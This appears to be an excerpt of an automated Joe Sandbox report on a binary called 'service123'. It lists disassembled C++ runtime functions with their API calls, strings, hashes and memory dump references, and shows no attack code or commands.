Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 1178fb9bda2569ae73838d20f2b7c1f1f806c1b0bf1b0825dc13b1ac507b5ca1
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 2A61F2B8909742CFC704DF19C58051AFBE4BFA8754F20891DE8AA8B761DB31E845DF92

Function 6C9E2940 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C9D711E), ref: 6C9E29B3

Strings

string::string, xrefs: 6C9E2B7E
basic_string::basic_string, xrefs: 6C9E2ABC, 6C9E2B19
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9E2AC4, 6C9E2B21, 6C9E2B86
basic_string::_M_create, xrefs: 6C9E29CA, 6C9E2A6A

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: da2bfb3fd2b722c7e412587448cf270b5045765a8b5be6716c542358e136631b
Instruction ID: ebf6c98c6dd9a8f89c14acca0f5581ec0eac31c9b9d2254175a37189cdbf6a4c
Opcode Fuzzy Hash: da2bfb3fd2b722c7e412587448cf270b5045765a8b5be6716c542358e136631b
Instruction Fuzzy Hash: 6F71A2B69097518FC300EF2CD48064AFBE4BF99218F59C9AED88C9B315D335C884CB92

Function 6C94EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: d36ed8b18de25d360de474c4d5214edce5a53c9f9df30da6d447f4ece52212cc
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 0C619F716097048FD714CF29C48065AF7E5BFD8318F44CE2EE8989BB54E730D9468B96

Function 6C95AE10 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C95ACEF), ref: 6CA15FF0
abort.MSVCRT(?,?,?,?,?,?,6C95AC4C,?,?,?,?,?,?,6CA16040), ref: 6CA15FF8
abort.MSVCRT(?,?,?,?,?,?,6C95AC4C,?,?,?,?,?,?,6CA16040), ref: 6CA16000
abort.MSVCRT(?,?,?,?,?,?,6C95AC4C,?,?,?,?,?,?,6CA16040), ref: 6CA16008

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e229dbd2f89a70f8ba3cc4728b9bea933e979975674b6b6fdf5cb8bffa24580b
Instruction ID: aac6484cd4980962a23e9427d0fd329d32c4b6432e9dcc01ac14ff9177e3e799
Opcode Fuzzy Hash: e229dbd2f89a70f8ba3cc4728b9bea933e979975674b6b6fdf5cb8bffa24580b
Instruction Fuzzy Hash: 6D4123B16092048FD700EF34C4812AEB7E2EF9220CF58886DD4848BF14DB35C49EC7A5

Function 6C941020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C941281,?,?,?,?,?,?,6C9413AE), ref: 6C941057
_amsg_exit.MSVCRT ref: 6C941086

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 452ca22514cbdd168fc01a28db2583e610b648e0e46b44ac3d99bffbff4152bb
Instruction ID: 29db4e0b72a4a6c08e11d795adbdc3af2f987bd193b0bba8f2b2feee7a42dbb8
Opcode Fuzzy Hash: 452ca22514cbdd168fc01a28db2583e610b648e0e46b44ac3d99bffbff4152bb
Instruction Fuzzy Hash: CC31AEB0319342CBEB049F2AC58136A77F4EB47398F12C529D494CBB40DB35C996CBA2

Function 6C961CB0 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C961CC8
strlen.MSVCRT ref: 6C961CD2
memcpy.MSVCRT ref: 6C961CEF
setlocale.MSVCRT ref: 6C961D02
wcsftime.MSVCRT ref: 6C961D26
setlocale.MSVCRT ref: 6C961D38

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction ID: 580dceb44c353cab01756661fa84bbb59dafb92d981f7e38e13eceb430796715
Opcode Fuzzy Hash: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction Fuzzy Hash: D11195B45093109FD740EF69C18465EFBE4BF98654F82882DF4C987710E778D855CB92

Function 6C961A00 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C961A18
strlen.MSVCRT ref: 6C961A22
memcpy.MSVCRT ref: 6C961A3F
setlocale.MSVCRT ref: 6C961A52
strftime.MSVCRT ref: 6C961A76
setlocale.MSVCRT ref: 6C961A88

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction ID: 86abadbc586254c35a7d1d64674ec468b0b63b8b83eae6477c5fdded2bd6fd39
Opcode Fuzzy Hash: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction Fuzzy Hash: D611B0B4909310AFD740EF69C18465EBBE4AFA4644F82882EF4C987701E778D8558BA2

Function 6C94ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 14e66a553a58a02e3a5b259f64da7c1958f4e4a9bab8cd9f942f8028dfa7b85a
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: B5B01231CDC664C5CB20D6BC00103D6F20ED763348F81480BC196A3D088712E0938156

Function 6C95DE80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C95DEC7
LocalFree.KERNEL32 ref: 6C95DEFB

Strings

basic_string: construction from null is not valid, xrefs: 6C95DF57
Unknown error code, xrefs: 6C95DF3C

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: c568b167d449052f9847b3ce56abfcdd5aea6caa913501e2466d227d03e7130a
Instruction ID: 323fdbc6792f97566f4c86aefeed87dea4fc87963fc3f31a6c2523cfb03a7a3d
Opcode Fuzzy Hash: c568b167d449052f9847b3ce56abfcdd5aea6caa913501e2466d227d03e7130a
Instruction Fuzzy Hash: 644178B2A187149BCB00AF69C58569EFBF8FF95714F40882CE484DBB14D7349499CB93

Function 6C953659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C953567
fputc.MSVCRT ref: 6C9535D7
memset.MSVCRT ref: 6C953692

Strings

o, xrefs: 6C95369A
0, xrefs: 6C953687

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: aca28c1c2c14758e6a7b9efce05da9c8a2c4941bfe1984c1ef0c45a575551c83
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: FE317CB1A083058FCB00CF78C0807AAB7F5BF48314F959629D999ABB45E338E816CF50

Function 00662F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00662E97
fputc.MSVCRT ref: 00662F07
memset.MSVCRT ref: 00662FC2

Strings

0, xrefs: 00662FB7
o, xrefs: 00662FCA

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: b5b3fbf6d063f517024f7a38f6bfff55f970a0533fa24c17cb50b9973da0cb31
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 42317C71A04B16CFCB10CF68C0A47AEBBF2BF58350F148A29D995AB742D739E945CB50

Function 6C949490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C9494C2
strlen.MSVCRT ref: 6C949616

Strings

_GLOBAL_, xrefs: 6C9494B7

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 33e26d30de850b6dbc90f3da4ab9df674f5e57ba8fedd4916d3d2236846b62b3
Instruction ID: e0983ca8c8cb931d70ab94471529335a6ddac1c3a76e2a2f4311204c3efb5cf4
Opcode Fuzzy Hash: 33e26d30de850b6dbc90f3da4ab9df674f5e57ba8fedd4916d3d2236846b62b3
Instruction Fuzzy Hash: 88F170709052288FEB20CF29C9943DDBBF9AF46308F1581EAC449AB745D775DA89CF81

Function 6C9BD860 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C9DF670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF70D
Part of subcall function 6C9DF670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF738

memcpy.MSVCRT ref: 6C9BDA65

Part of subcall function 6C9E22E0: memcpy.MSVCRT(?,-00000001,?,6C96724E,?,?,?,?,?,?,?,?,?,?,?,6C968BD5), ref: 6C9E231C

Strings

iostream error, xrefs: 6C9BDAB8
basic_string::append, xrefs: 6C9BDB62, 6C9BDB6E
Unknown error, xrefs: 6C9BD8B8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 8e533e0c3e9cda28a38702c512c4fbc70605e18603041efd936f7d2e7eed9bfc
Instruction ID: c10b8a5c713c8f229aec459fb6eec60994574b757002a1a410eac2a1d545137a
Opcode Fuzzy Hash: 8e533e0c3e9cda28a38702c512c4fbc70605e18603041efd936f7d2e7eed9bfc
Instruction Fuzzy Hash: 11A11476D093189BCB14DFA8C48469EBBF5BF48314F25892ED494ABB54D730A885CF82

Function 6C9ABD10 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C9ABDEF
memcpy.MSVCRT ref: 6C9ABE49
memcpy.MSVCRT ref: 6C9ABED7

Part of subcall function 6C9AC2B0: memcpy.MSVCRT ref: 6C9AC33C

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9ABF63
basic_string::replace, xrefs: 6C9ABF44, 6C9ABF57

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 3f98278e6ad63213a4a60b9fed4a45a4bd6bff35cf87111a4f1b52c2892c6600
Instruction ID: 3938e320b45f9b5d7aa66d21cef9fabb341c36daf300573fd3b98ae37663bcd6
Opcode Fuzzy Hash: 3f98278e6ad63213a4a60b9fed4a45a4bd6bff35cf87111a4f1b52c2892c6600
Instruction Fuzzy Hash: B58159B2A097199FCB00DF68C48059EBBF5FF88314F15892EE99887710D730D956CB92

Function 6C9B4DB0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C9B4E80
memcpy.MSVCRT ref: 6C9B4ED4
memcpy.MSVCRT ref: 6C9B4F68

Part of subcall function 6C9B5340: memcpy.MSVCRT ref: 6C9B53D0

Strings

basic_string::replace, xrefs: 6C9B4FD9, 6C9B4FEC
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9B4FF8

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: d0b62fd35a98d234cc014f69926f4257629c43ec26cf73687ec4095f4eddff7a
Instruction ID: b40fd2a98f2402e044009c6a3c122bc526aef4c69174a51591eeae5250157952
Opcode Fuzzy Hash: d0b62fd35a98d234cc014f69926f4257629c43ec26cf73687ec4095f4eddff7a
Instruction Fuzzy Hash: C2812775A09205AFCB00DF6CD48059EBBF5AF89254F11C92EE898EBB10E730D954DF92

Function 6C9BD5C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9DF670: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF70D
Part of subcall function 6C9DF670: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9BD7DE), ref: 6C9DF738

strlen.MSVCRT ref: 6C9BD695
memcpy.MSVCRT ref: 6C9BD76E

Strings

iostream error, xrefs: 6C9BD7C2
Unknown error, xrefs: 6C9BD60E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 8e457a99ab37e826d776289535298ad4f2ac0b47f1a7fb6cf6e5675e15baa79a
Instruction ID: cf6abb9ba4900b6ccf682cbea1a282250bdb6f0f22d2f25e9d4e93361ace62a0
Opcode Fuzzy Hash: 8e457a99ab37e826d776289535298ad4f2ac0b47f1a7fb6cf6e5675e15baa79a
Instruction Fuzzy Hash: 6361D2B59043089BCB04DFA8C08469EBBF5BF88314F14892ED499AB754E774D849CB92

Function 6C94F840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C94F85F
ReleaseSemaphore.KERNEL32 ref: 6C94F8E3

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: b71a144c93f38f6977c896a92cac3b5635d315134fd268085b00b2d4007909ab
Instruction ID: 6a0032f7991e43da904b70851459ce563a193c5186a0a113c0b8613d4a2d401d
Opcode Fuzzy Hash: b71a144c93f38f6977c896a92cac3b5635d315134fd268085b00b2d4007909ab
Instruction Fuzzy Hash: 6B3146B0A093029FDB19DF2AC5487167BF4FB46318F16C65CD8998B681D335D446CBA2

Function 6C94FCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C94FCEC
ReleaseSemaphore.KERNEL32 ref: 6C94FD7C
CreateSemaphoreW.KERNEL32 ref: 6C94FDC7
WaitForSingleObject.KERNEL32 ref: 6C94FE10

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

